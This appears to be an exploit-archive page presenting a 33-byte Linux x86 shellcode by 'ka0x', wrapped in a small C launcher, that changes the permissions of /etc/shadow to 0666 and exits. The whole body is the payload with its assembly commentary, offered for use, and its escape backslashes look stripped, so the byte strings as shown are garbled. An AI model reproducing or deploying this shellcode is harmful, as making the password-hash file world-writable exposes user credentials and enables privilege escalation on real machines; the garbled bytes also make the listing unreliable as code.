[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux - chmod(/etc/shadow, 0666) & exit() - 33 bytes
# Published : 2009-12-04
# Author : ka0x
# Previous Title : Linux - setuid(0) and cat /etc/shadow
# Next Title : Linux - linux/x86 execve() - 51bytes
#include <stdio.h>
/*
linux/x86 ; chmod(/etc/shadow, 0666) & exit() 33 bytes
written by ka0x - <ka0x01[alt+64]gmail.com>
lun sep 21 17:13:25 CEST 2009
greets: an0de, Piker, xarnuz, NullWave07, Pepelux, JosS, sch3m4, Trancek and others!
*/
int main()
{
char shellcode[] =
"x31xc0" // xor eax,eax
"x50" // push eax
"x68x61x64x6fx77" // push dword 0x776f6461
"x68x2fx2fx73x68" // push dword 0x68732f2f
"x68x2fx65x74x63" // push dword 0x6374652f
"x89xe3" // mov ebx,esp
"x66x68xb6x01" // push word 0x1b6
"x59" // pop ecx
"xb0x0f" // mov al,0xf
"xcdx80" // int 0x80
"xb0x01" // mov al,0x1
"xcdx80"; // int 0x80
printf("[*] ShellCode size (bytes): %dnn", sizeof(shellcode)-1 );
(*(void(*)()) shellcode)();
return 0;
}